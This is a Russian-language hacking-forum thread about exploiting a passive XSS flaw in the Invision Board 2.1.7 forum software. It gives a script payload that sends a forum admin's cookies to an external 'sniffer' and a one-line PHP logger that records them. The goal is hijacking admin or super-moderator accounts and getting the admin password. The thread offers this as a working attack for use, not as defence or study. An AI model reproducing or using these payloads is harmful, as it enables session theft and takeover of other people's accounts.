Давайте поподробнее поговорим об пассивном Xss в Ibp 2.1.7. Предупреждаю - опыта у меня ой как мало и понимаю маловато, поэтому и пришел сюда. Фичу с внедрением алерта в заголовок ЛС я усвоил. Но мелькало что-то про модеров... чего там можно добиться? И до чего вобще можно дойти, используя этот Xss? Только с описанием поподробней плз.
XSS - Cross Site Scripting Данная бага позволяет тебе украсть куки. Требуется чтоб админ глянул эту страничку с XSS скриптом - ты получишь куки, которые тебе обеспечат доступ. Для того чтобы получить куки тебе понадобится сниффер - скрипт который приймет сигнал от XSS скрипта и запишет куки. XSS скрипт: Code: <script>img = new Image(); img.src='_PATH_';</script> Где _PATH_ - путь к снифферу. Я лично юзаю свой сниффер. Можешь юзать например ачатовский. Пример XSS + sniff Code: <script>img = new Image(); img.src='_PATH_';</script> sniff Code: <? fputs(fopen("log.txt","a+"),$_SERVER['QUERY_STRING']); ?>
Хм, админ должен заглянуть на страничку с Xss... Т.е. в случае с ИБП он должен просто отурыть мое ЛС, в заголовке которого и будет Xss? И вопрос наперед - когда я получу куки, что надо будет сделать для их расшифровки, дабы получить пароль? Просто залогиниться не устраивает =(
Используя XSS ты можешь получить права супермодера. Об этом говорили подробно много раз. Я не считаю нужным оставлять тему открытой ибо, либо куки с xss = супермодер, либо инфа с базы и => пасс админа. Закрыто. ПС: Я пожалуй предупрежу: Если ты маловато знаешь - попробуй узнать больше своими силами, тут тебе не faq.